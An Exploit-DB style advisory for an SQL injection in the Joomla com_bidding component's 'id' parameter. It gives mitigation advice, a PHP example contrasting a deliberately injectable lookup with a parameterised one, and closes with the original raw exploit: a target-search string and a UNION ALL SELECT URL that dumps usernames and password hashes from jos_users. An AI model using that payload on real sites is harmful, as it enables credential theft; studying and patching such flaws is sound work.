Vendor: Joomla com_bidding
By: N2n-Hacker
CVSS: 7.5 (HIGH)
CWE: SQL Injection
Product Name: Joomla com_bidding
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Joomla com_bidding Sql Injection Vulnerability

The Joomla com_bidding component is vulnerable to SQL injection. The 'id' parameter of index.php?option=com_bidding is used in a database query without validation or escaping, so anyone who can manipulate the URL can inject arbitrary SQL and read data from the database. The original advisory demonstrates this by appending a UNION ALL SELECT statement to the 'id' value, which returns usernames and passwords from the 'jos_users' table in the page output.

Mitigation:

To mitigate this vulnerability, the vendor should validate the 'id' parameter and pass it to the database through prepared statements or parameterized queries, so that request data is never concatenated into the SQL string. Users are advised to update to the latest version of the Joomla com_bidding component.
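The vulnerable pattern and its hardened counterpart side by side, as an added example that is not the com_bidding component's own code. It assumes a PDO connection and an in-memory SQLite database with a constructed jos_bidding_items table standing in for whatever the component really queries; the hardened version validates the parameter as a positive integer and binds it, so the UNION payload from the advisory never reaches the SQL parser.

```php
<?php
// Added example, not code from the com_bidding component. Uses an in-memory
// SQLite database via PDO so it runs stand-alone; jos_bidding_items is a
// constructed stand-in table, jos_users mirrors the table named in the advisory.

function vulnerableLookup(PDO $db, string $id): array
{
    // The raw request value is spliced into the SQL text, so an id such as
    // "-200 UNION ALL SELECT ..." rewrites the query. This is the flaw
    // described in the advisory.
    $sql = "SELECT id, title FROM jos_bidding_items WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function hardenedLookup(PDO $db, string $id): array
{
    // 1) Validate: the id must be a positive integer; anything else is rejected
    //    before a query is even built (the equivalent of a getInt()-style read).
    $int = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($int === false) {
        return [];
    }
    // 2) Parameterise: the value is bound as an integer and is never parsed
    //    as part of the SQL statement.
    $stmt = $db->prepare('SELECT id, title FROM jos_bidding_items WHERE id = :id');
    $stmt->bindValue(':id', $int, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- constructed demo data (not real Joomla rows) ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jos_bidding_items (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)');
$db->exec("INSERT INTO jos_bidding_items VALUES (200, 'Antique clock')");
$db->exec("INSERT INTO jos_users VALUES (62, 'admin', '<password hash placeholder>')");

$benign  = '200';
$hostile = '-200 UNION ALL SELECT username, password FROM jos_users';

// The vulnerable path answers the hostile request with jos_users rows;
// the hardened path rejects the same input during validation.
print_r(vulnerableLookup($db, $benign));
print_r(vulnerableLookup($db, $hostile));
print_r(hardenedLookup($db, $benign));
print_r(hardenedLookup($db, $hostile));
```

With MySQL, also disable emulated prepares (PDO::ATTR_EMULATE_PREPARES => false) so binding is done server-side rather than by client-side quoting.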

Exploit-DB raw data:

#########################################################################
#########################################################################

                [ Joomla com_bidding Sql Injection Vulnerability ]

                          N2n-Hacker ----- 2nd@live.fr


#########################################################################
#########################################################################


# Searching = "option=com_bidding"


==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--

# error =
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"


==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--



            \\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////

#########################################################################
                    My Bad Life But Not For4ver nchallah
#########################################################################